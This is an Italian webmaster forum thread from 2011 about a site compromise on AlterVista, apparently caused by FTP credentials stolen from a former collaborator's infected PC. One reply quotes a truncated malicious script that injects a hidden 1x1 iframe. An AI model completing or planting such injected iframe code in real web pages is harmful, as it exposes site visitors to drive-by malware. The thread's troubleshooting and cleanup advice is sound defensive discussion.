Malware sul sito

Printable View

14-11-2011, 00.15.24

Malware sul sito

Saalve, dopo un secolo torno a postare su AV per una cosa che mi è successa su uno dei siti che ho qui su AlterVista.

Oggi accedendo (dopo qualche settimana di inattività) al pannello di controllo mi è stato chiesto di cambiare la password per "motivi di sicurezza".

Dopo averlo fatto, ho letto un avviso che mi avvisava della presenza di malware sul mio sito... ed effettivamente c'erano 3 cartelle con dicitura casuale alfanumerica nella root, con dentro un singolo file html. Ho subito provveduto a eliminarle, ma ora mi viene il dubbio: com'è possibile che qualcuno sia riuscito a caricarvele quando solo io possiedo la pass, il sito non è né pubblico (in via di sviluppo, occorre un login per accedere) né pubblicizzato, e comunque non vi è alcuno spazio per l'upload dei file nel sito.

Ho controllato sul mio PC e non c'è traccia di contagio... com'è potuto essere?
Al limite si può avere un log dei "movimenti FTP", così da capire meglio?

Se serve, l'url è h**p://zortar.altervista.org
15-11-2011, 00.05.06
andreafallico

Inoltre c'è del codice javascript malevolo:

Codice:

<script type="text/javascript">function get_cookie(Name) { ..... document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="....</script>

http://forum.it.altervista.org/759986-post30.html
15-11-2011, 10.38.14
dapeco

Questo tipo di infezione normalmente è causata dalla presenza di worm sul pc utilizzato per l'aggiornamento, via ftp, del sito web. Esegui una scansione approfondita con un buon antivirus.
16-11-2011, 00.22.44

Non avevo notato il JavaScript O.o rimosso all'istante.

Il bello è che una scansione non mi rileva niente, e il codice è presente solo su quel sito (e in FileZilla ne ho memorizzati ben più di uno)... proverò altri antivirus, vediam...

EDIT: Probabilmente ho capito. Tempo addietro lavoravo al progetto insieme a un altro programmatore che poi *puff* è sparito, mesi fa. Probabilmente ha lasciato comunque memorizzati i dati da qualche parte nel suo PC, ed è stato lui ad essere stato infettato. Ho cambiato ovviamente la password, vediamo se ricapita :)
16-11-2011, 08.46.36
dapeco

Sì, il problema principale di questi worm è che spesso prendono le password, ma non usano immediatamente le credenziali, anzi spesso possono passare settimane se non mesi prima della compromissione dei contenuti.